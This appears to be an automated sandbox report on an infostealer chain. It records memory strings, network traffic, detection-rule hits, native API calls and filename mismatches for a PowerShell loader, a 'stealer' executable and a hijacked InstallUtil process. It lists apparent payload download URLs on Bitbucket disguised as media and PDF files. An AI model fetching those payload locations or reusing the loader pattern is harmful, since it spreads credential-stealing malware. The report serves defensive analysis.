Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E77000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7B000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7F000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002876000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/3e10a657-95f6-
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004ED5000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/ad174d1e-b961-
Source: stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002876000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b1e8acb6-ab61-
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002831000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org
Source: stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002831000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/312351234123/12312312412adsada/downloads/Gqjmdstn.pdf
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.00000000052EC000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000000.2143600636.0000000000642000.00000002.00000001.01000000.00000007.sdmp, stealer-CR-0110.exe.7.dr	String found in binary or memory: https://bitbucket.org/312351234123/12312312412adsada/downloads/Gqjmdstn.pdfv
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005376000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005382000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4530426029.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/312351234123/12312312412adsada/downloads/Hgjcrxfnz.mp3
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/312351234123/12312312412adsada/downloads/Llbodzuyqnk.wav
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E77000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7B000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E77000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7B000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E77000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7B000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E77000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7B000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004EEA000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.00000000028E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E77000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7B000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.231.171.137:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.27.130:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.27.130:443 -> 192.168.2.5:49709 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior

Reads the System eventlog

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: 849128312.cmd.Fjz PID: 6640, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Abnormal high CPU Usage

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E3DB58 NtResumeThread,	7_2_08E3DB58
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E3C5D8 NtProtectVirtualMemory,	7_2_08E3C5D8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E3DB51 NtResumeThread,	7_2_08E3DB51
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E3C5A7 NtProtectVirtualMemory,	7_2_08E3C5A7
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D6E0B8 NtResumeThread,	8_2_05D6E0B8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D6CB80 NtProtectVirtualMemory,	8_2_05D6CB80
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D6E0B3 NtResumeThread,	8_2_05D6E0B3
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D6CB78 NtProtectVirtualMemory,	8_2_05D6CB78

Detected potential crypto function

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABA760	7_2_04ABA760
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABA3F8	7_2_04ABA3F8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABF158	7_2_04ABF158
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABE470	7_2_04ABE470
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABA751	7_2_04ABA751
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABA888	7_2_04ABA888
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABA8F6	7_2_04ABA8F6
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABA801	7_2_04ABA801
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABA95E	7_2_04ABA95E
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABAA96	7_2_04ABAA96
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABAA56	7_2_04ABAA56
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_04ABABB0	7_2_04ABABB0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06D86687	7_2_06D86687
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06D87AA4	7_2_06D87AA4
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06D8A797	7_2_06D8A797
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06D8A7A8	7_2_06D8A7A8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06D80748	7_2_06D80748
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06D84050	7_2_06D84050
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DBEFD0	7_2_06DBEFD0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DB1D58	7_2_06DB1D58
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DBB68A	7_2_06DBB68A
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DB22CF	7_2_06DB22CF
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DBF2F7	7_2_06DBF2F7
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DBB03A	7_2_06DBB03A
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DBB038	7_2_06DBB038
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DBBAD0	7_2_06DBBAD0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DBBAC0	7_2_06DBBAC0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DB0919	7_2_06DB0919
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DB0928	7_2_06DB0928
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DFF278	7_2_06DFF278
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DF06E0	7_2_06DF06E0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_07451B50	7_2_07451B50
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E35200	7_2_08E35200
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E39480	7_2_08E39480
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E358A1	7_2_08E358A1
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E358B0	7_2_08E358B0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E351EF	7_2_08E351EF
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E3B2F0	7_2_08E3B2F0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E3947B	7_2_08E3947B
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E366A8	7_2_08E366A8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E366B8	7_2_08E366B8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E57EB8	7_2_08E57EB8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E5C008	7_2_08E5C008
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E5C018	7_2_08E5C018
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E57EA8	7_2_08E57EA8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_093BD8F0	7_2_093BD8F0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_093A001E	7_2_093A001E
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_093A0040	7_2_093A0040
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_07452448	7_2_07452448
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_07452374	7_2_07452374
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_02642BD8	8_2_02642BD8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_02642925	8_2_02642925
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_02642980	8_2_02642980
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_02641D76	8_2_02641D76
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_02641D80	8_2_02641D80
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_04954C30	8_2_04954C30
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_04956E88	8_2_04956E88
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_04958284	8_2_04958284
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_0495B3F0	8_2_0495B3F0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_04954C20	8_2_04954C20
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_0495A1B0	8_2_0495A1B0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_0495A1A0	8_2_0495A1A0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_0495D1C0	8_2_0495D1C0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_04951390	8_2_04951390
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_04951380	8_2_04951380
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_0495B3E0	8_2_0495B3E0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D657A0	8_2_05D657A0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D646F0	8_2_05D646F0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D6C8E0	8_2_05D6C8E0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D60040	8_2_05D60040
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D69AA8	8_2_05D69AA8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D65790	8_2_05D65790
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D646EA	8_2_05D646EA
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D65E10	8_2_05D65E10
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D65E20	8_2_05D65E20
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D6C8D1	8_2_05D6C8D1
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D69A98	8_2_05D69A98
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D977B0	8_2_05D977B0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D90040	8_2_05D90040
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D90DAA	8_2_05D90DAA
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D90CB8	8_2_05D90CB8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D90CA8	8_2_05D90CA8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D977A0	8_2_05D977A0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D90007	8_2_05D90007
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D95343	8_2_05D95343
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05DA0040	8_2_05DA0040
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05DA3A90	8_2_05DA3A90
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05DA1648	8_2_05DA1648
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05DA0367	8_2_05DA0367
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_0709CF23	8_2_0709CF23
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_07093E79	8_2_07093E79
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_0709CB70	8_2_0709CB70
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_070939B8	8_2_070939B8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_0709D39D	8_2_0709D39D
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_07092100	8_2_07092100
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_070939A8	8_2_070939A8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_070920F0	8_2_070920F0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_074FCD88	8_2_074FCD88
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_074E0040	8_2_074E0040
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_074E001E	8_2_074E001E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_02CB2008	9_2_02CB2008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_02CB2018	9_2_02CB2018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_02CB2645	9_2_02CB2645
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_025D1C18	13_2_025D1C18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_025D1C28	13_2_025D1C28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_025D55D0	13_2_025D55D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_025D55C2	13_2_025D55C2

One or more processes crash

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 2268

Sample file is different than original file name gathered from version info

Source: 849128312.cmd.Fjz, 00000007.00000000.2063299773.0000000000A74000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFile-CR-0110-CMD2.exeD vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVvzcd.dll" vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2216633711.00000000086E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameVvzcd.dll" vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006711000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2223259743.0000000008FD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamestealer-CR-0110.exe@ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVvzcd.dll" vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2224438229.0000000009270000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005376000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamehvnc-CR-SCR3-0110.exeD vs 849128312.cmd
